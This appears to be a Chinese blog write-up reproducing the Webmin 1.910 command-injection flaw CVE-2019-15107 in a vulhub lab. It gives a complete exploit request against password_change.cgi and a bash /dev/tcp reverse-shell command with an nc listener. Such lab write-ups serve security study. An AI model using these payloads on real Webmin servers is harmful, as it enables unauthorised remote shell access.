-
Webmin 远程命令执行漏洞_CVE-2019-15107
Webmin 远程命令执行漏洞_CVE-2019-15107
在线漏洞详情:
https://vulhub.org/#/environments/webmin/CVE-2019-15107/- 1
漏洞描述:
版本影响:
Webmin 1.910
环境搭建
cd ~/vulhub/webmin/CVE-2019-15107- 1
环境启动:
sudo docker-compose up -d # 下载拉取环境 sudo docker ps -a # 查看下载拉取的文件- 1
- 2
- 3
已启动:访问端口10000
漏洞复现
访问
https://192.168.225.166:10000/
使用BP进行抓包
POC
POST /password_change.cgi- 1
发送以下POST请求来执行命令id:
POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60 user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
复现成功
漏洞利用-shell反弹
执行反弹指令
bash -c "bash -i &> /dev/tcp/192.168.225.166/6666 0<&1" nc -lvp 6666- 1
- 2
- 3
bp的id替换成url编码反弹shell脚本
成功反弹
-
相关阅读:
CANOpen之PDO传输
力扣739:每日温度 (Java多种方法)
请求转发和重定向区别
windows 2012 server 禁止某个IP不可以访问指定端口
UDS知识整理(四):ECU复位——0x11服务
经纬恒润推出全新一代智能电动座椅模块
ctfshow—溯源—新手上路
Ubuntu安装桌面环境以及远程桌面连接
【JavaWeb】Servlet详解
最全讲解磁珠
- 原文地址:https://blog.csdn.net/weixin_42786460/article/details/133827769